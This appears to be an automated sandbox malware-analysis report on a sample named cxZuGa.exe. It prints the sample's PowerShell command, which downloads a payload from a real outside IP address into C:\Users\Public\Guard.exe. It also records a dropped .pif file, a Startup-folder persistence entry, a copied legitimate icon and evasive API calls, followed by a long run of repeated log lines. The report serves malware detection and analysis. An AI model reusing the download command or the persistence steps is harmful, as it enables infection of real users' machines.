Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: cxZuGa.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: cxZuGa.exeStatic file information: File size 1083904 > 1048576
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cxZuGa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: cxZuGa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cxZuGa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cxZuGa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cxZuGa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cxZuGa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cxZuGa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC126D1C LoadLibraryA,GetProcAddress,0_2_00007FF7EC126D1C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1578FD push rdi; ret 0_2_00007FF7EC157904
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC157399 push rdi; ret 0_2_00007FF7EC1573A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F100BD pushad ; iretd 4_2_00007FF848F100C1
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C36BCC push ebp; ret 6_2_00C36BE6
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C36BA3 push 68F900C3h; ret 6_2_00C36BAE
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C58B75 push ecx; ret 6_2_00C58B88
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C36C68 push 683600C3h; ret 6_2_00C36C72
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C36C73 push ebp; ret 6_2_00C36C7E
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C3521F push ecx; ret 6_2_00C35222
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C6F34B push ebp; ret 6_2_00C6F350
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C6F357 push ebp; ret 6_2_00C6F35C
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C6F351 push ebp; ret 6_2_00C6F354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00618B75 push ecx; ret 11_2_00618B88

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF7EC144514
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00CB59B3
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00C45EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_006759B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00605EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00605EDA
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00C533B7
Source: C:\Users\user\Desktop\cxZuGa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4753Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5084Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5543Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4281Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\cxZuGa.exeAPI coverage: 3.7 %
